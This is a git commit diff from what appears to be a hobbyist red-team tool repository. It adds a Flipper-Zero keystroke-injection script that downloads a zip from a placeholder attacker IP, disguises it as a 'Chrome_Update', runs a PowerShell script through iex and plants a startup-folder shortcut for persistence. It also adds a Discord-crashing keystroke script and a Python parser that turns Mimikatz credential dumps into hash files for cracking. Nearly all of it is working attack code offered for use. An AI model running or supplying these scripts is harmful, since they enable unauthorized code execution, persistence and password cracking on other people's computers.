Creation of Katz^2

Reflect non-functionality

Duckyscripts/GooseDropper/GooseDropper.txt

@@ -0,0 +1,23 @@
+REM TITLE GooseDropper
+REM AUTHOR Fr3ki
+REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell wget YOUR_IP/ZIP -OutFile $ENV:Temp/Update.zip
+ENTER
+DELAY 8000
+GUI r
+DELAY 500
+STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
+ENTER
+DELAY 3000
+GUI r
+DELAY 500
+STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
+ENTER
+DELAY 1000
+GUI r
+DELAY 500
+STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
+ENTER

Duckyscripts/GooseDropper/PersistentGoose.ps1

@@ -0,0 +1,6 @@
+$WScriptShell = New-Object -ComObject WScript.Shell
+$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
+$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
+$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
+$Shortcut.TargetPath = $TargetFile
+$Shortcut.Save()

Duckyscripts/GooseDropper/README.md

@@ -0,0 +1,25 @@
+**======= Goose Dropper v2.0 ========**
+
+This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
+
+
+--------------------------------------------------------------------------------------------------------------
+**Important Notes:**
+
+Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
+
+All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
+
+**=== v2.0 Notes ==**
+    
+    Added persistence via a PowerShell script that makes a shortcut in the startup folder.
+    
+    Revamped updater with more options and better dialogue. 
+    
+    Bugfixes to ensure payloads get delivered successfully.
+
+**=== v2.1 Notes ==**
+    
+    Simplified configurators to remove unnecessary complexity
+    
+    Added Windows auto-configuration tool.

Duckyscripts/GooseDropper/linux_setup.sh

@@ -0,0 +1,31 @@
+#!/bin/bash
+
+IP=$1
+ZIP=$2
+PERSIST=$3
+
+#Ensure required arguments are not empty
+if [ "${IP}" == "" ] | [ "${ZIP}" == "" ];
+then
+  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+  exit
+fi
+
+#Check for help command
+if [ "${IP,,}" == "-h" ] | [ "${IP,,}" == "help" ];
+then
+  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+  exit
+fi
+
+#Replace placeholders with provided values
+sed -i "s/YOUR_IP/$IP/" GooseDropper.txt
+sed -i "s/ZIP/$ZIP/" GooseDropper.txt
+
+#Remove persistance if desired
+if [ "${PERSIST,,}" == "n" ];
+then
+	sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
+else
+	break
+fi

Duckyscripts/GooseDropper/windows_setup.ps1

@@ -0,0 +1,30 @@
+param (
+    [string]$HELP,
+    [string]$IP,
+    [string]$ZIP,
+    [string]$PERSIST
+)
+
+# Ensure required arguments are not empty
+if (-not $IP -or -not $ZIP) {
+    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+    exit
+}
+
+# Check for help command
+if ($HELP) {
+    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+    exit
+}
+
+# Replace placeholders with provided values
+(Get-Content "GooseDropper.txt") | ForEach-Object { $_ -replace 'YOUR_IP', $IP -replace 'ZIP', $ZIP } | Set-Content "GooseDropper.txt"
+
+# Remove persistence if desired
+if ($PERSIST.ToLower() -eq "n") {
+    $lines = Get-Content "GooseDropper.txt"
+    $lines = $lines[0..14] + $lines[19..($lines.Length - 1)]
+    Set-Content "GooseDropper.txt" $lines
+} else {
+    break
+}

Duckyscripts/Kill_Discord/README.txt

@@ -0,0 +1,12 @@
+# This specific "Exploit" has been patched and is no-longer usable.
+---
+
+Kill_Discord is a duckyscript that does exactly what the name implies.
+
+As of April 2024 the string "http://./\<#0>:  ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.
+
+This script opens Discord on the target machine and pastes that string into the first available text box.
+
+Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript.
+
+As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool.

Duckyscripts/Kill_Discord/kill_discord.txt

@@ -0,0 +1,12 @@
+DELAY 500
+GUI r
+DELAY 500
+STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe
+DELAY 500
+ENTER
+DELAY 2000
+CTRL k
+DELAY 100
+ENTER
+DELAY 500
+STRING http://./\<#0>:  ://./<#0>

README.md

@@ -1,2 +1,6 @@
 # Misadventures
-Red/Purple-Team tools
+This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
+
+Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
+
+Licence: https://www.gnu.org/licenses/gpl-3.0.html

katz2/README.md

@@ -0,0 +1,14 @@
+# Katz^2
+Katz Squared is a small python parser for Mimikatz log files, allowing for username/hash combos to be written to txt files, ready for use with Hashcat (you get the joke yet?) or John.
+
+---
+
+Usage: `katz2.py [-h] -f/--file -m/--mode`
+-
+**Modes:** 
+ - logonpasswords - Used for files containing the output of the mimikatz module of the same name.
+ - cache -- Used for files containing the output of the lsadump::cache mimikatz module
+ ---
+ **License:**
+ 
+ GPLv3 as all good software should be.

katz2/katz2.py

@@ -0,0 +1,68 @@
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-f", "--file", help="Mimikatz output file", required=True)
+parser.add_argument("-m", "--mode", help="Mimikatz mode used to obtain the output logonpasswords|cache", required=True)
+args = parser.parse_args()
+
+def dump(creds):
+    if isinstance(creds, list) and len(creds) >= 2:
+        username = creds[0]
+        hsh = creds[1]
+        dumpfile = username+".txt"
+        with open(dumpfile, "w+") as df:
+            df.write(hsh)
+    else:
+        pass
+
+def sekurlsa():
+    filename = args.file
+    creds = []
+    with open(filename) as f:
+        for line in f:
+            if "authentication" in line.lower():
+                dump(creds)
+                creds = []
+            elif "username" in line.lower():
+                username = line.split(":")[1].strip()
+                if username.lower() in creds or username.lower() == "(null)":
+                    pass
+                else:
+                    creds.append(username.lower())
+            elif "ntlm" in line.lower():
+                ntlm = line.strip().split(":")[1].strip()
+                if ntlm in creds:
+                    pass
+                else:
+                    creds.append(ntlm)
+
+def cache():
+    filename = args.file
+    creds = []
+    with open(filename) as f:
+        for line in f:
+            if "nl$" in line.lower():
+                print(creds)
+                dump(creds)
+                creds = []
+            elif "user" in line.lower():
+                username = line.split(":")[1].strip()
+                if username.lower() in creds or username.lower() == "(null)":
+                    pass
+                else:
+                    creds.append(username.lower())
+            elif "mscachev2" in line.lower():
+                mscache = line.strip().split(":")[1].strip()
+                if mscache in creds:
+                    pass
+                else:
+                    creds.append(mscache)
+
+    print("[+] Credential pairs written to disk")
+
+if __name__ == "__main__":
+    match args.mode:
+        case "logonpasswords":
+            sekurlsa()
+        case "cache":
+            cache()